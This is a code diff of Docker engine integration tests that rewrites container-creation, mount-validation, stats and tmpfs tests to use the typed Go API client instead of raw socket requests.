-	c.Assert(json.Unmarshal(body, &containerJSON), check.IsNil)
+	containerJSON, err := cli.ContainerInspect(context.Background(), container.ID)
+	c.Assert(err, check.IsNil)
 
-	c.Assert(*containerJSON.HostConfig.MemorySwappiness, check.Equals, int64(-1))
+	if versions.LessThan(testEnv.DaemonAPIVersion(), "1.31") {
+		c.Assert(*containerJSON.HostConfig.MemorySwappiness, check.Equals, int64(-1))
+	} else {
+		c.Assert(containerJSON.HostConfig.MemorySwappiness, check.IsNil)
+	}
 }
 
 // check validation is done daemon side and not only in cli
@@ -1481,42 +1614,43 @@ func (s *DockerSuite) TestPostContainersCreateWithOomScoreAdjInvalidRange(c *che
 	// OomScoreAdj is not supported on Windows
 	testRequires(c, DaemonIsLinux)
 
-	config := struct {
-		Image       string
-		OomScoreAdj int
-	}{"busybox", 1001}
+	config := containertypes.Config{
+		Image: "busybox",
+	}
+
+	hostConfig := containertypes.HostConfig{
+		OomScoreAdj: 1001,
+	}
+
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
 	name := "oomscoreadj-over"
-	status, b, err := sockRequest("POST", "/containers/create?name="+name, config)
-	c.Assert(err, check.IsNil)
-	c.Assert(status, check.Equals, http.StatusInternalServerError)
+	_, err = cli.ContainerCreate(context.Background(), &config, &hostConfig, &networktypes.NetworkingConfig{}, name)
 
 	expected := "Invalid value 1001, range for oom score adj is [-1000, 1000]"
-	msg := getErrorMessage(c, b)
-	if !strings.Contains(msg, expected) {
-		c.Fatalf("Expected output to contain %q, got %q", expected, msg)
+	c.Assert(err.Error(), checker.Contains, expected)
+
+	hostConfig = containertypes.HostConfig{
+		OomScoreAdj: -1001,
 	}
 
-	config = struct {
-		Image       string
-		OomScoreAdj int
-	}{"busybox", -1001}
 	name = "oomscoreadj-low"
-	status, b, err = sockRequest("POST", "/containers/create?name="+name, config)
-	c.Assert(err, check.IsNil)
-	c.Assert(status, check.Equals, http.StatusInternalServerError)
+	_, err = cli.ContainerCreate(context.Background(), &config, &hostConfig, &networktypes.NetworkingConfig{}, name)
+
 	expected = "Invalid value -1001, range for oom score adj is [-1000, 1000]"
-	msg = getErrorMessage(c, b)
-	if !strings.Contains(msg, expected) {
-		c.Fatalf("Expected output to contain %q, got %q", expected, msg)
-	}
+	c.Assert(err.Error(), checker.Contains, expected)
 }
 
 // test case for #22210 where an empty container name caused panic.
 func (s *DockerSuite) TestContainerAPIDeleteWithEmptyName(c *check.C) {
-	status, out, err := sockRequest("DELETE", "/containers/", nil)
+	cli, err := client.NewEnvClient()
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusBadRequest)
-	c.Assert(string(out), checker.Contains, "No container name or ID supplied")
+	defer cli.Close()
+
+	err = cli.ContainerRemove(context.Background(), "", types.ContainerRemoveOptions{})
+	c.Assert(err.Error(), checker.Contains, "No such container")
 }
 
 func (s *DockerSuite) TestContainerAPIStatsWithNetworkDisabled(c *check.C) {
@@ -1524,31 +1658,33 @@ func (s *DockerSuite) TestContainerAPIStatsWithNetworkDisabled(c *check.C) {
 	testRequires(c, DaemonIsLinux)
 
 	name := "testing-network-disabled"
-	config := map[string]interface{}{
-		"Image":           "busybox",
-		"Cmd":             []string{"top"},
-		"NetworkDisabled": true,
+
+	config := containertypes.Config{
+		Image:           "busybox",
+		Cmd:             []string{"top"},
+		NetworkDisabled: true,
 	}
 
-	status, _, err := sockRequest("POST", "/containers/create?name="+name, config)
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
+	_, err = cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, name)
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusCreated)
 
-	status, _, err = sockRequest("POST", "/containers/"+name+"/start", nil)
+	err = cli.ContainerStart(context.Background(), name, types.ContainerStartOptions{})
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusNoContent)
 
 	c.Assert(waitRun(name), check.IsNil)
 
 	type b struct {
-		status int
-		body   []byte
-		err    error
+		stats types.ContainerStats
+		err   error
 	}
 	bc := make(chan b, 1)
 	go func() {
-		status, body, err := sockRequest("GET", "/containers/"+name+"/stats", nil)
-		bc <- b{status, body, err}
+		stats, err := cli.ContainerStats(context.Background(), name, false)
+		bc <- b{stats, err}
 	}()
 
 	// allow some time to stream the stats from the container
@@ -1562,26 +1698,15 @@ func (s *DockerSuite) TestContainerAPIStatsWithNetworkDisabled(c *check.C) {
 		c.Fatal("stream was not closed after container was removed")
 	case sr := <-bc:
 		c.Assert(sr.err, checker.IsNil)
-		c.Assert(sr.status, checker.Equals, http.StatusOK)
-
-		// decode only one object from the stream
-		var s *types.Stats
-		dec := json.NewDecoder(bytes.NewBuffer(sr.body))
-		c.Assert(dec.Decode(&s), checker.IsNil)
+		sr.stats.Body.Close()
 	}
 }
 
 func (s *DockerSuite) TestContainersAPICreateMountsValidation(c *check.C) {
-	type m mounttypes.Mount
-	type hc struct{ Mounts []m }
-	type cfg struct {
-		Image      string
-		HostConfig hc
-	}
 	type testCase struct {
-		config cfg
-		status int
-		msg    string
+		config     containertypes.Config
+		hostConfig containertypes.HostConfig
+		msg        string
 	}
 
 	prefix, slash := getPrefixAndSlashFromDaemonPlatform()
@@ -1590,176 +1715,185 @@ func (s *DockerSuite) TestContainersAPICreateMountsValidation(c *check.C) {
 
 	cases := []testCase{
 		{
-			config: cfg{
+			config: containertypes.Config{
 				Image: "busybox",
-				HostConfig: hc{
-					Mounts: []m{{
-						Type:   "notreal",
-						Target: destPath}}}},
-			status: http.StatusBadRequest,
-			msg:    "mount type unknown",
+			},
+			hostConfig: containertypes.HostConfig{
+				Mounts: []mounttypes.Mount{{
+					Type:   "notreal",
+					Target: destPath,
+				},
+				},
+			},
+
+			msg: "mount type unknown",
 		},
 		{
-			config: cfg{
+			config: containertypes.Config{
 				Image: "busybox",
-				HostConfig: hc{
-					Mounts: []m{{
-						Type: "bind"}}}},
-			status: http.StatusBadRequest,
-			msg:    "Target must not be empty",
+			},
+			hostConfig: containertypes.HostConfig{
+				Mounts: []mounttypes.Mount{{
+					Type: "bind"}}},
+			msg: "Target must not be empty",
 		},
 		{
-			config: cfg{
+			config: containertypes.Config{
 				Image: "busybox",
-				HostConfig: hc{
-					Mounts: []m{{
-						Type:   "bind",
-						Target: destPath}}}},
-			status: http.StatusBadRequest,
-			msg:    "Source must not be empty",
+			},
+			hostConfig: containertypes.HostConfig{
+				Mounts: []mounttypes.Mount{{
+					Type:   "bind",
+					Target: destPath}}},
+			msg: "Source must not be empty",
 		},
 		{
-			config: cfg{
+			config: containertypes.Config{
 				Image: "busybox",
-				HostConfig: hc{
-					Mounts: []m{{
-						Type:   "bind",
-						Source: notExistPath,
-						Target: destPath}}}},
-			status: http.StatusBadRequest,
-			msg:    "bind source path does not exist",
+			},
+			hostConfig: containertypes.HostConfig{
+				Mounts: []mounttypes.Mount{{
+					Type:   "bind",
+					Source: notExistPath,
+					Target: destPath}}},
+			msg: "source path does not exist",
+			// FIXME(vdemeester) fails into e2e, migrate to integration/container anyway
+			// msg: "bind mount source path does not exist: " + notExistPath,
 		},
 		{
-			config: cfg{
+			config: containertypes.Config{
 				Image: "busybox",
-				HostConfig: hc{
-					Mounts: []m{{
-						Type: "volume"}}}},
-			status: http.StatusBadRequest,
-			msg:    "Target must not be empty",
+			},
+			hostConfig: containertypes.HostConfig{
+				Mounts: []mounttypes.Mount{{
+					Type: "volume"}}},
+			msg: "Target must not be empty",
 		},
 		{
-			config: cfg{
+			config: containertypes.Config{
 				Image: "busybox",
-				HostConfig: hc{
-					Mounts: []m{{
-						Type:   "volume",
-						Source: "hello",
-						Target: destPath}}}},
-			status: http.StatusCreated,
-			msg:    "",
+			},
+			hostConfig: containertypes.HostConfig{
+				Mounts: []mounttypes.Mount{{
+					Type:   "volume",
+					Source: "hello",
+					Target: destPath}}},
+			msg: "",
 		},
 		{
-			config: cfg{
+			config: containertypes.Config{
 				Image: "busybox",
-				HostConfig: hc{
-					Mounts: []m{{
-						Type:   "volume",
-						Source: "hello2",
-						Target: destPath,
-						VolumeOptions: &mounttypes.VolumeOptions{
-							DriverConfig: &mounttypes.Driver{
-								Name: "local"}}}}}},
-			status: http.StatusCreated,
-			msg:    "",
+			},
+			hostConfig: containertypes.HostConfig{
+				Mounts: []mounttypes.Mount{{
+					Type:   "volume",
+					Source: "hello2",
+					Target: destPath,
+					VolumeOptions: &mounttypes.VolumeOptions{
+						DriverConfig: &mounttypes.Driver{
+							Name: "local"}}}}},
+			msg: "",
 		},
 	}
 
-	if SameHostDaemon.Condition() {
+	if SameHostDaemon() {
 		tmpDir, err := ioutils.TempDir("", "test-mounts-api")
 		c.Assert(err, checker.IsNil)
 		defer os.RemoveAll(tmpDir)
 		cases = append(cases, []testCase{
 			{
-				config: cfg{
+				config: containertypes.Config{
 					Image: "busybox",
-					HostConfig: hc{
-						Mounts: []m{{
-							Type:   "bind",
-							Source: tmpDir,
-							Target: destPath}}}},
-				status: http.StatusCreated,
-				msg:    "",
+				},
+				hostConfig: containertypes.HostConfig{
+					Mounts: []mounttypes.Mount{{
+						Type:   "bind",
+						Source: tmpDir,
+						Target: destPath}}},
+				msg: "",
 			},
 			{
-				config: cfg{
+				config: containertypes.Config{
 					Image: "busybox",
-					HostConfig: hc{
-						Mounts: []m{{
-							Type:          "bind",
-							Source:        tmpDir,
-							Target:        destPath,
-							VolumeOptions: &mounttypes.VolumeOptions{}}}}},
-				status: http.StatusBadRequest,
-				msg:    "VolumeOptions must not be specified",
+				},
+				hostConfig: containertypes.HostConfig{
+					Mounts: []mounttypes.Mount{{
+						Type:          "bind",
+						Source:        tmpDir,
+						Target:        destPath,
+						VolumeOptions: &mounttypes.VolumeOptions{}}}},
+				msg: "VolumeOptions must not be specified",
 			},
 		}...)
 	}
 
-	if DaemonIsLinux.Condition() {
+	if DaemonIsLinux() {
 		cases = append(cases, []testCase{
 			{
-				config: cfg{
+				config: containertypes.Config{
 					Image: "busybox",
-					HostConfig: hc{
-						Mounts: []m{{
-							Type:   "volume",
-							Source: "hello3",
-							Target: destPath,
-							VolumeOptions: &mounttypes.VolumeOptions{
-								DriverConfig: &mounttypes.Driver{
-									Name:    "local",
-									Options: map[string]string{"o": "size=1"}}}}}}},
-				status: http.StatusCreated,
-				msg:    "",
+				},
+				hostConfig: containertypes.HostConfig{
+					Mounts: []mounttypes.Mount{{
+						Type:   "volume",
+						Source: "hello3",
+						Target: destPath,
+						VolumeOptions: &mounttypes.VolumeOptions{
+							DriverConfig: &mounttypes.Driver{
+								Name:    "local",
+								Options: map[string]string{"o": "size=1"}}}}}},
+				msg: "",
 			},
 			{
-				config: cfg{
+				config: containertypes.Config{
 					Image: "busybox",
-					HostConfig: hc{
-						Mounts: []m{{
-							Type:   "tmpfs",
-							Target: destPath}}}},
-				status: http.StatusCreated,
-				msg:    "",
+				},
+				hostConfig: containertypes.HostConfig{
+					Mounts: []mounttypes.Mount{{
+						Type:   "tmpfs",
+						Target: destPath}}},
+				msg: "",
 			},
 			{
-				config: cfg{
+				config: containertypes.Config{
 					Image: "busybox",
-					HostConfig: hc{
-						Mounts: []m{{
-							Type:   "tmpfs",
-							Target: destPath,
-							TmpfsOptions: &mounttypes.TmpfsOptions{
-								SizeBytes: 4096 * 1024,
-								Mode:      0700,
-							}}}}},
-				status: http.StatusCreated,
-				msg:    "",
+				},
+				hostConfig: containertypes.HostConfig{
+					Mounts: []mounttypes.Mount{{
+						Type:   "tmpfs",
+						Target: destPath,
+						TmpfsOptions: &mounttypes.TmpfsOptions{
+							SizeBytes: 4096 * 1024,
+							Mode:      0700,
+						}}}},
+				msg: "",
 			},
 
 			{
-				config: cfg{
+				config: containertypes.Config{
 					Image: "busybox",
-					HostConfig: hc{
-						Mounts: []m{{
-							Type:   "tmpfs",
-							Source: "/shouldnotbespecified",
-							Target: destPath}}}},
-				status: http.StatusBadRequest,
-				msg:    "Source must not be specified",
+				},
+				hostConfig: containertypes.HostConfig{
+					Mounts: []mounttypes.Mount{{
+						Type:   "tmpfs",
+						Source: "/shouldnotbespecified",
+						Target: destPath}}},
+				msg: "Source must not be specified",
 			},
 		}...)
 
 	}
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
 
 	for i, x := range cases {
 		c.Logf("case %d", i)
-		status, b, err := sockRequest("POST", "/containers/create", x.config)
-		c.Assert(err, checker.IsNil)
-		c.Assert(status, checker.Equals, x.status, check.Commentf("%s\n%v", string(b), cases[i].config))
+		_, err = cli.ContainerCreate(context.Background(), &x.config, &x.hostConfig, &networktypes.NetworkingConfig{}, "")
 		if len(x.msg) > 0 {
-			c.Assert(string(b), checker.Contains, x.msg, check.Commentf("%v", cases[i].config))
+			c.Assert(err.Error(), checker.Contains, x.msg, check.Commentf("%v", cases[i].config))
+		} else {
+			c.Assert(err, checker.IsNil)
 		}
 	}
 }
@@ -1774,15 +1908,21 @@ func (s *DockerSuite) TestContainerAPICreateMountsBindRead(c *check.C) {
 	defer os.RemoveAll(tmpDir)
 	err = ioutil.WriteFile(filepath.Join(tmpDir, "bar"), []byte("hello"), 666)
 	c.Assert(err, checker.IsNil)
-
-	data := map[string]interface{}{
-		"Image":      "busybox",
-		"Cmd":        []string{"/bin/sh", "-c", "cat /foo/bar"},
-		"HostConfig": map[string]interface{}{"Mounts": []map[string]interface{}{{"Type": "bind", "Source": tmpDir, "Target": destPath}}},
+	config := containertypes.Config{
+		Image: "busybox",
+		Cmd:   []string{"/bin/sh", "-c", "cat /foo/bar"},
+	}
+	hostConfig := containertypes.HostConfig{
+		Mounts: []mounttypes.Mount{
+			{Type: "bind", Source: tmpDir, Target: destPath},
+		},
 	}
-	status, resp, err := sockRequest("POST", "/containers/create?name=test", data)
-	c.Assert(err, checker.IsNil, check.Commentf(string(resp)))
-	c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf(string(resp)))
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
+	_, err = cli.ContainerCreate(context.Background(), &config, &hostConfig, &networktypes.NetworkingConfig{}, "test")
+	c.Assert(err, checker.IsNil)
 
 	out, _ := dockerCmd(c, "start", "-a", "test")
 	c.Assert(out, checker.Equals, "hello")
@@ -1794,47 +1934,86 @@ func (s *DockerSuite) TestContainersAPICreateMountsCreate(c *check.C) {
 	destPath := prefix + slash + "foo"
 
 	var (
-		err     error
 		testImg string
 	)
-	if daemonPlatform != "windows" {
-		testImg, err = buildImage("test-mount-config", `
+	if testEnv.OSType != "windows" {
+		testImg = "test-mount-config"
+		buildImageSuccessfully(c, testImg, build.WithDockerfile(`
 	FROM busybox
 	RUN mkdir `+destPath+` && touch `+destPath+slash+`bar
 	CMD cat `+destPath+slash+`bar
-	`, true)
+	`))
 	} else {
 		testImg = "busybox"
 	}
-	c.Assert(err, checker.IsNil)
 
 	type testCase struct {
-		cfg      mounttypes.Mount
+		spec     mounttypes.Mount
 		expected types.MountPoint
 	}
 
+	var selinuxSharedLabel string
+	// this test label was added after a bug fix in 1.32, thus add requirements min API >= 1.32
+	// for the sake of making test pass in earlier versions
+	// bug fixed in https://github.com/moby/moby/pull/34684
+	if !versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") {
+		if runtime.GOOS == "linux" {
+			selinuxSharedLabel = "z"
+		}
+	}
+
 	cases := []testCase{
 		// use literal strings here for `Type` instead of the defined constants in the volume package to keep this honest
 		// Validation of the actual `Mount` struct is done in another test is not needed here
-		{mounttypes.Mount{Type: "volume", Target: destPath}, types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath}},
-		{mounttypes.Mount{Type: "volume", Target: destPath + slash}, types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath}},
-		{mounttypes.Mount{Type: "volume", Target: destPath, Source: "test1"}, types.MountPoint{Type: "volume", Name: "test1", RW: true, Destination: destPath}},
-		{mounttypes.Mount{Type: "volume", Target: destPath, ReadOnly: true, Source: "test2"}, types.MountPoint{Type: "volume", Name: "test2", RW: false, Destination: destPath}},
-		{mounttypes.Mount{Type: "volume", Target: destPath, Source: "test3", VolumeOptions: &mounttypes.VolumeOptions{DriverConfig: &mounttypes.Driver{Name: volume.DefaultDriverName}}}, types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", Name: "test3", RW: true, Destination: destPath}},
+		{
+			spec:     mounttypes.Mount{Type: "volume", Target: destPath},
+			expected: types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath, Mode: selinuxSharedLabel},
+		},
+		{
+			spec:     mounttypes.Mount{Type: "volume", Target: destPath + slash},
+			expected: types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath, Mode: selinuxSharedLabel},
+		},
+		{
+			spec:     mounttypes.Mount{Type: "volume", Target: destPath, Source: "test1"},
+			expected: types.MountPoint{Type: "volume", Name: "test1", RW: true, Destination: destPath, Mode: selinuxSharedLabel},
+		},
+		{
+			spec:     mounttypes.Mount{Type: "volume", Target: destPath, ReadOnly: true, Source: "test2"},
+			expected: types.MountPoint{Type: "volume", Name: "test2", RW: false, Destination: destPath, Mode: selinuxSharedLabel},
+		},
+		{
+			spec:     mounttypes.Mount{Type: "volume", Target: destPath, Source: "test3", VolumeOptions: &mounttypes.VolumeOptions{DriverConfig: &mounttypes.Driver{Name: volume.DefaultDriverName}}},
+			expected: types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", Name: "test3", RW: true, Destination: destPath, Mode: selinuxSharedLabel},
+		},
 	}
 
-	if SameHostDaemon.Condition() {
+	if SameHostDaemon() {
 		// setup temp dir for testing binds
 		tmpDir1, err := ioutil.TempDir("", "test-mounts-api-1")
 		c.Assert(err, checker.IsNil)
 		defer os.RemoveAll(tmpDir1)
 		cases = append(cases, []testCase{
-			{mounttypes.Mount{Type: "bind", Source: tmpDir1, Target: destPath}, types.MountPoint{Type: "bind", RW: true, Destination: destPath, Source: tmpDir1}},
-			{mounttypes.Mount{Type: "bind", Source: tmpDir1, Target: destPath, ReadOnly: true}, types.MountPoint{Type: "bind", RW: false, Destination: destPath, Source: tmpDir1}},
+			{
+				spec: mounttypes.Mount{
+					Type:   "bind",
+					Source: tmpDir1,
+					Target: destPath,
+				},
+				expected: types.MountPoint{
+					Type:        "bind",
+					RW:          true,
+					Destination: destPath,
+					Source:      tmpDir1,
+				},
+			},
+			{
+				spec:     mounttypes.Mount{Type: "bind", Source: tmpDir1, Target: destPath, ReadOnly: true},
+				expected: types.MountPoint{Type: "bind", RW: false, Destination: destPath, Source: tmpDir1},
+			},
 		}...)
 
 		// for modes only supported on Linux
-		if DaemonIsLinux.Condition() {
+		if DaemonIsLinux() {
 			tmpDir3, err := ioutils.TempDir("", "test-mounts-api-3")
 			c.Assert(err, checker.IsNil)
 			defer os.RemoveAll(tmpDir3)
@@ -1843,19 +2022,40 @@ func (s *DockerSuite) TestContainersAPICreateMountsCreate(c *check.C) {
 			c.Assert(mount.ForceMount("", tmpDir3, "none", "shared"), checker.IsNil)
 
 			cases = append(cases, []testCase{
-				{mounttypes.Mount{Type: "bind", Source: tmpDir3, Target: destPath}, types.MountPoint{Type: "bind", RW: true, Destination: destPath, Source: tmpDir3}},
-				{mounttypes.Mount{Type: "bind", Source: tmpDir3, Target: destPath, ReadOnly: true}, types.MountPoint{Type: "bind", RW: false, Destination: destPath, Source: tmpDir3}},
-				{mounttypes.Mount{Type: "bind", Source: tmpDir3, Target: destPath, ReadOnly: true, BindOptions: &mounttypes.BindOptions{Propagation: "shared"}}, types.MountPoint{Type: "bind", RW: false, Destination: destPath, Source: tmpDir3, Propagation: "shared"}},
+				{
+					spec:     mounttypes.Mount{Type: "bind", Source: tmpDir3, Target: destPath},
+					expected: types.MountPoint{Type: "bind", RW: true, Destination: destPath, Source: tmpDir3},
+				},
+				{
+					spec:     mounttypes.Mount{Type: "bind", Source: tmpDir3, Target: destPath, ReadOnly: true},
+					expected: types.MountPoint{Type: "bind", RW: false, Destination: destPath, Source: tmpDir3},
+				},
+				{
+					spec:     mounttypes.Mount{Type: "bind", Source: tmpDir3, Target: destPath, ReadOnly: true, BindOptions: &mounttypes.BindOptions{Propagation: "shared"}},
+					expected: types.MountPoint{Type: "bind", RW: false, Destination: destPath, Source: tmpDir3, Propagation: "shared"},
+				},
 			}...)
 		}
 	}
 
-	if daemonPlatform != "windows" { // Windows does not support volume populate
+	if testEnv.OSType != "windows" { // Windows does not support volume populate
 		cases = append(cases, []testCase{
-			{mounttypes.Mount{Type: "volume", Target: destPath, VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath}},
-			{mounttypes.Mount{Type: "volume", Target: destPath + slash, VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath}},
-			{mounttypes.Mount{Type: "volume", Target: destPath, Source: "test4", VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, types.MountPoint{Type: "volume", Name: "test4", RW: true, Destination: destPath}},
-			{mounttypes.Mount{Type: "volume", Target: destPath, Source: "test5", ReadOnly: true, VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, types.MountPoint{Type: "volume", Name: "test5", RW: false, Destination: destPath}},
+			{
+				spec:     mounttypes.Mount{Type: "volume", Target: destPath, VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}},
+				expected: types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath, Mode: selinuxSharedLabel},
+			},
+			{
+				spec:     mounttypes.Mount{Type: "volume", Target: destPath + slash, VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}},
+				expected: types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath, Mode: selinuxSharedLabel},
+			},
+			{
+				spec:     mounttypes.Mount{Type: "volume", Target: destPath, Source: "test4", VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}},
+				expected: types.MountPoint{Type: "volume", Name: "test4", RW: true, Destination: destPath, Mode: selinuxSharedLabel},
+			},
+			{
+				spec:     mounttypes.Mount{Type: "volume", Target: destPath, Source: "test5", ReadOnly: true, VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}},
+				expected: types.MountPoint{Type: "volume", Name: "test5", RW: false, Destination: destPath, Mode: selinuxSharedLabel},
+			},
 		}...)
 	}
 
@@ -1866,96 +2066,142 @@ func (s *DockerSuite) TestContainersAPICreateMountsCreate(c *check.C) {
 	type createResp struct {
 		ID string `json:"Id"`
 	}
-	for i, x := range cases {
-		c.Logf("case %d - config: %v", i, x.cfg)
-		status, data, err := sockRequest("POST", "/containers/create", wrapper{containertypes.Config{Image: testImg}, containertypes.HostConfig{Mounts: []mounttypes.Mount{x.cfg}}})
-		c.Assert(err, checker.IsNil, check.Commentf(string(data)))
-		c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf(string(data)))
-
-		var resp createResp
-		err = json.Unmarshal(data, &resp)
-		c.Assert(err, checker.IsNil, check.Commentf(string(data)))
-		id := resp.ID
-
-		var mps []types.MountPoint
-		err = json.NewDecoder(strings.NewReader(inspectFieldJSON(c, id, "Mounts"))).Decode(&mps)
-		c.Assert(err, checker.IsNil)
-		c.Assert(mps, checker.HasLen, 1)
-		c.Assert(mps[0].Destination, checker.Equals, x.expected.Destination)
 
-		if len(x.expected.Source) > 0 {
-			c.Assert(mps[0].Source, checker.Equals, x.expected.Source)
+	ctx := context.Background()
+	apiclient := testEnv.APIClient()
+	for i, x := range cases {
+		c.Logf("case %d - config: %v", i, x.spec)
+		container, err := apiclient.ContainerCreate(
+			ctx,
+			&containertypes.Config{Image: testImg},
+			&containertypes.HostConfig{Mounts: []mounttypes.Mount{x.spec}},
+			&networktypes.NetworkingConfig{},
+			"")
+		assert.NilError(c, err)
+
+		containerInspect, err := apiclient.ContainerInspect(ctx, container.ID)
+		assert.NilError(c, err)
+		mps := containerInspect.Mounts
+		assert.Assert(c, is.Len(mps, 1))
+		mountPoint := mps[0]
+
+		if x.expected.Source != "" {
+			assert.Check(c, is.Equal(x.expected.Source, mountPoint.Source))
 		}
-		if len(x.expected.Name) > 0 {
-			c.Assert(mps[0].Name, checker.Equals, x.expected.Name)
+		if x.expected.Name != "" {
+			assert.Check(c, is.Equal(x.expected.Name, mountPoint.Name))
 		}
-		if len(x.expected.Driver) > 0 {
-			c.Assert(mps[0].Driver, checker.Equals, x.expected.Driver)
+		if x.expected.Driver != "" {
+			assert.Check(c, is.Equal(x.expected.Driver, mountPoint.Driver))
 		}
-		c.Assert(mps[0].RW, checker.Equals, x.expected.RW)
-		c.Assert(mps[0].Type, checker.Equals, x.expected.Type)
-		c.Assert(mps[0].Mode, checker.Equals, x.expected.Mode)
-		if len(x.expected.Propagation) > 0 {
-			c.Assert(mps[0].Propagation, checker.Equals, x.expected.Propagation)
+		if x.expected.Propagation != "" {
+			assert.Check(c, is.Equal(x.expected.Propagation, mountPoint.Propagation))
 		}
-
-		out, _, err := dockerCmdWithError("start", "-a", id)
-		if (x.cfg.Type != "volume" || (x.cfg.VolumeOptions != nil && x.cfg.VolumeOptions.NoCopy)) && daemonPlatform != "windows" {
-			c.Assert(err, checker.NotNil, check.Commentf("%s\n%v", out, mps[0]))
-		} else {
-			c.Assert(err, checker.IsNil, check.Commentf("%s\n%v", out, mps[0]))
+		assert.Check(c, is.Equal(x.expected.RW, mountPoint.RW))
+		assert.Check(c, is.Equal(x.expected.Type, mountPoint.Type))
+		assert.Check(c, is.Equal(x.expected.Mode, mountPoint.Mode))
+		assert.Check(c, is.Equal(x.expected.Destination, mountPoint.Destination))
+
+		err = apiclient.ContainerStart(ctx, container.ID, types.ContainerStartOptions{})
+		assert.NilError(c, err)
+		poll.WaitOn(c, containerExit(apiclient, container.ID), poll.WithDelay(time.Second))
+
+		err = apiclient.ContainerRemove(ctx, container.ID, types.ContainerRemoveOptions{
+			RemoveVolumes: true,
+			Force:         true,
+		})
+		assert.NilError(c, err)
+
+		switch {
+
+		// Named volumes still exist after the container is removed
+		case x.spec.Type == "volume" && len(x.spec.Source) > 0:
+			_, err := apiclient.VolumeInspect(ctx, mountPoint.Name)
+			assert.NilError(c, err)
+
+		// Bind mounts are never removed with the container
+		case x.spec.Type == "bind":
+
+		// anonymous volumes are removed
+		default:
+			_, err := apiclient.VolumeInspect(ctx, mountPoint.Name)
+			assert.Check(c, client.IsErrNotFound(err))
 		}
+	}
+}
 
-		dockerCmd(c, "rm", "-fv", id)
-		if x.cfg.Type == "volume" && len(x.cfg.Source) > 0 {
-			// This should still exist even though we removed the container
-			dockerCmd(c, "volume", "inspect", mps[0].Name)
-		} else {
-			// This should be removed automatically when we removed the container
-			out, _, err := dockerCmdWithError("volume", "inspect", mps[0].Name)
-			c.Assert(err, checker.NotNil, check.Commentf(out))
+func containerExit(apiclient client.APIClient, name string) func(poll.LogT) poll.Result {
+	return func(logT poll.LogT) poll.Result {
+		container, err := apiclient.ContainerInspect(context.Background(), name)
+		if err != nil {
+			return poll.Error(err)
+		}
+		switch container.State.Status {
+		case "created", "running":
+			return poll.Continue("container %s is %s, waiting for exit", name, container.State.Status)
 		}
+		return poll.Success()
 	}
 }
 
 func (s *DockerSuite) TestContainersAPICreateMountsTmpfs(c *check.C) {
 	testRequires(c, DaemonIsLinux)
 	type testCase struct {
-		cfg             map[string]interface{}
+		cfg             mounttypes.Mount
 		expectedOptions []string
 	}
 	target := "/foo"
 	cases := []testCase{
 		{
-			cfg: map[string]interface{}{
-				"Type":   "tmpfs",
-				"Target": target},
+			cfg: mounttypes.Mount{
+				Type:   "tmpfs",
+				Target: target},
 			expectedOptions: []string{"rw", "nosuid", "nodev", "noexec", "relatime"},
 		},
 		{
-			cfg: map[string]interface{}{
-				"Type":   "tmpfs",
-				"Target": target,
-				"TmpfsOptions": map[string]interface{}{
-					"SizeBytes": 4096 * 1024, "Mode": 0700}},
+			cfg: mounttypes.Mount{
+				Type:   "tmpfs",
+				Target: target,
+				TmpfsOptions: &mounttypes.TmpfsOptions{
+					SizeBytes: 4096 * 1024, Mode: 0700}},
 			expectedOptions: []string{"rw", "nosuid", "nodev", "noexec", "relatime", "size=4096k", "mode=700"},
 		},
 	}
 
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
+	config := containertypes.Config{
+		Image: "busybox",
+		Cmd:   []string{"/bin/sh", "-c", fmt.Sprintf("mount | grep 'tmpfs on %s'", target)},
+	}
 	for i, x := range cases {
 		cName := fmt.Sprintf("test-tmpfs-%d", i)
-		data := map[string]interface{}{
-			"Image": "busybox",
-			"Cmd": []string{"/bin/sh", "-c",
-				fmt.Sprintf("mount | grep 'tmpfs on %s'", target)},
-			"HostConfig": map[string]interface{}{"Mounts": []map[string]interface{}{x.cfg}},
+		hostConfig := containertypes.HostConfig{
+			Mounts: []mounttypes.Mount{x.cfg},
 		}
-		status, resp, err := sockRequest("POST", "/containers/create?name="+cName, data)
-		c.Assert(err, checker.IsNil, check.Commentf(string(resp)))
-		c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf(string(resp)))
+
+		_, err = cli.ContainerCreate(context.Background(), &config, &hostConfig, &networktypes.NetworkingConfig{}, cName)
+		c.Assert(err, checker.IsNil)
 		out, _ := dockerCmd(c, "start", "-a", cName)
 		for _, option := range x.expectedOptions {
 			c.Assert(out, checker.Contains, option)
 		}
 	}
 }
+
+// Regression test for #33334
